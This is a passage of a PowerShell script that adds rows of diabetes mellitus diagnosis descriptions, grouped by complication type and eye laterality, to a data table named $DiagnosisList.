with periodontal disease") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with oral complications","Type 1 diabetes mellitus with other oral complications") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with hypoglycemia","Type 1 diabetes mellitus with hypoglycemia with coma") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with hypoglycemia","Type 1 diabetes mellitus with hypoglycemia without coma") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with hyperglycemia","Type 1 diabetes mellitus with hyperglycemia") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with other specified complication","Type 1 diabetes mellitus with other specified complication") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus with unspecified complications","Type 1 diabetes mellitus with unspecified complications") + $null = $DiagnosisList.Rows.Add("Type 1 diabetes mellitus without complications","Type 1 diabetes mellitus without complications") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with hyperosmolarity","Type 2 diabetes mellitus with hyperosmolarity without nonketotic hyperglycemic-hyperosmolar coma (NKHHC)") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with hyperosmolarity","Type 2 diabetes mellitus with hyperosmolarity with coma") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with ketoacidosis","Type 2 diabetes mellitus with ketoacidosis without coma") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with ketoacidosis","Type 2 diabetes mellitus with ketoacidosis with coma") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with kidney complications","Type 2 diabetes mellitus with diabetic nephropathy") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with kidney complications","Type 2 diabetes mellitus with diabetic chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with kidney complications","Type 2 diabetes mellitus with other diabetic kidney complication") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with unspecified diabetic retinopathy","Type 2 diabetes mellitus with unspecified diabetic retinopathy with macular edema") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with unspecified diabetic retinopathy","Type 2 diabetes mellitus with unspecified diabetic retinopathy without macular edema") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Type 2 diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Type 2 diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with stable proliferative diabetic retinopathy","Type 2 diabetes mellitus with stable proliferative diabetic retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with stable proliferative diabetic retinopathy","Type 2 diabetes mellitus with stable proliferative diabetic retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with stable proliferative diabetic retinopathy","Type 2 diabetes mellitus with stable proliferative diabetic retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with stable proliferative diabetic retinopathy","Type 2 diabetes mellitus with stable proliferative diabetic retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema","Type 2 diabetes mellitus with proliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with diabetic cataract","Type 2 diabetes mellitus with diabetic cataract") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment, right eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment, left eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment, bilateral") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment","Type 2 diabetes mellitus with diabetic macular edema, resolved following treatment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with other diabetic ophthalmic complication","Type 2 diabetes mellitus with other diabetic ophthalmic complication") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with neurological complications","Type 2 diabetes mellitus with diabetic neuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with neurological complications","Type 2 diabetes mellitus with diabetic mononeuropathy") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with neurological complications","Type 2 diabetes mellitus with diabetic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with neurological complications","Type 2 diabetes mellitus with diabetic autonomic (poly)neuropathy") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with neurological complications","Type 2 diabetes mellitus with diabetic amyotrophy") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with neurological complications","Type 2 diabetes mellitus with other diabetic neurological complication") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with circulatory complications","Type 2 diabetes mellitus with diabetic peripheral angiopathy without gangrene") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with circulatory complications","Type 2 diabetes mellitus with diabetic peripheral angiopathy with gangrene") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with circulatory complications","Type 2 diabetes mellitus with other circulatory complications") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with diabetic arthropathy","Type 2 diabetes mellitus with diabetic neuropathic arthropathy") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with diabetic arthropathy","Type 2 diabetes mellitus with other diabetic arthropathy") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with skin complications","Type 2 diabetes mellitus with diabetic dermatitis") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with skin complications","Type 2 diabetes mellitus with foot ulcer") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with skin complications","Type 2 diabetes mellitus with other skin ulcer") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with skin complications","Type 2 diabetes mellitus with other skin complications") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with oral complications","Type 2 diabetes mellitus with periodontal disease") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with oral complications","Type 2 diabetes mellitus with other oral complications") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with hypoglycemia","Type 2 diabetes mellitus with hypoglycemia with coma") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with hypoglycemia","Type 2 diabetes mellitus with hypoglycemia without coma") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with hyperglycemia","Type 2 diabetes mellitus with hyperglycemia") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with other specified complication","Type 2 diabetes mellitus with other specified complication") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus with unspecified complications","Type 2 diabetes mellitus with unspecified complications") + $null = $DiagnosisList.Rows.Add("Type 2 diabetes mellitus without complications","Type 2 diabetes mellitus without complications") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with hyperosmolarity","Other specified diabetes mellitus with hyperosmolarity without nonketotic hyperglycemic-hyperosmolar coma (NKHHC)") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with hyperosmolarity","Other specified diabetes mellitus with hyperosmolarity with coma") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with ketoacidosis","Other specified diabetes mellitus with ketoacidosis without coma") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with ketoacidosis","Other specified diabetes mellitus with ketoacidosis with coma") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with kidney complications","Other specified diabetes mellitus with diabetic nephropathy") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with kidney complications","Other specified diabetes mellitus with diabetic chronic kidney disease") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with kidney complications","Other specified diabetes mellitus with other diabetic kidney complication") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with unspecified diabetic retinopathy","Other specified diabetes mellitus with unspecified diabetic retinopathy with macular edema") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with unspecified diabetic retinopathy","Other specified diabetes mellitus with unspecified diabetic retinopathy without macular edema") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with mild nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with moderate nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with severe nonproliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy with macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula","Other specified diabetes mellitus with proliferative diabetic retinopathy with traction retinal detachment not involving the macula, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment","Other specified diabetes mellitus with proliferative diabetic retinopathy with combined traction retinal detachment and rhegmatogenous retinal detachment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with stable proliferative diabetic retinopathy","Other specified diabetes mellitus with stable proliferative diabetic retinopathy, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with stable proliferative diabetic retinopathy","Other specified diabetes mellitus with stable proliferative diabetic retinopathy, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with stable proliferative diabetic retinopathy","Other specified diabetes mellitus with stable proliferative diabetic retinopathy, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with stable proliferative diabetic retinopathy","Other specified diabetes mellitus with stable proliferative diabetic retinopathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema","Other specified diabetes mellitus with proliferative diabetic retinopathy without macular edema, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with diabetic cataract","Other specified diabetes mellitus with diabetic cataract") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with diabetic macular edema, resolved following treatment","Other specified diabetes mellitus with diabetic macular edema, resolved following treatment, right eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with diabetic macular edema, resolved following treatment","Other specified diabetes mellitus with diabetic macular edema, resolved following treatment, left eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with diabetic macular edema, resolved following treatment","Other specified diabetes mellitus with diabetic macular edema, resolved following treatment, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with diabetic macular edema, resolved following treatment","Other specified diabetes mellitus with diabetic macular edema, resolved following treatment, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with other diabetic ophthalmic complication","Other specified diabetes mellitus with other diabetic ophthalmic complication") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with neurological complications","Other specified diabetes mellitus with diabetic neuropathy, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with neurological complications","Other specified diabetes mellitus with diabetic mononeuropathy") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with neurological complications","Other specified diabetes mellitus with diabetic polyneuropathy") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with neurological complications","Other specified diabetes mellitus with diabetic autonomic (poly)neuropathy") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with neurological complications","Other specified diabetes mellitus with diabetic amyotrophy") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with neurological complications","Other specified diabetes mellitus with other diabetic neurological complication") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with circulatory complications","Other specified diabetes mellitus with diabetic peripheral angiopathy without gangrene") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with circulatory complications","Other specified diabetes mellitus with diabetic peripheral angiopathy with gangrene") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with circulatory complications","Other specified diabetes mellitus with other circulatory complications") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with diabetic arthropathy","Other specified diabetes mellitus with diabetic neuropathic arthropathy") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with diabetic arthropathy","Other specified diabetes mellitus with other diabetic arthropathy") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with skin complications","Other specified diabetes mellitus with diabetic dermatitis") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with skin complications","Other specified diabetes mellitus with foot ulcer") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with skin complications","Other specified diabetes mellitus with other skin ulcer") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with skin complications","Other specified diabetes mellitus with other skin complications") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with oral complications","Other specified diabetes mellitus with periodontal disease") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with oral complications","Other specified diabetes mellitus with other oral complications") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with hypoglycemia","Other specified diabetes mellitus with hypoglycemia with coma") + $null = 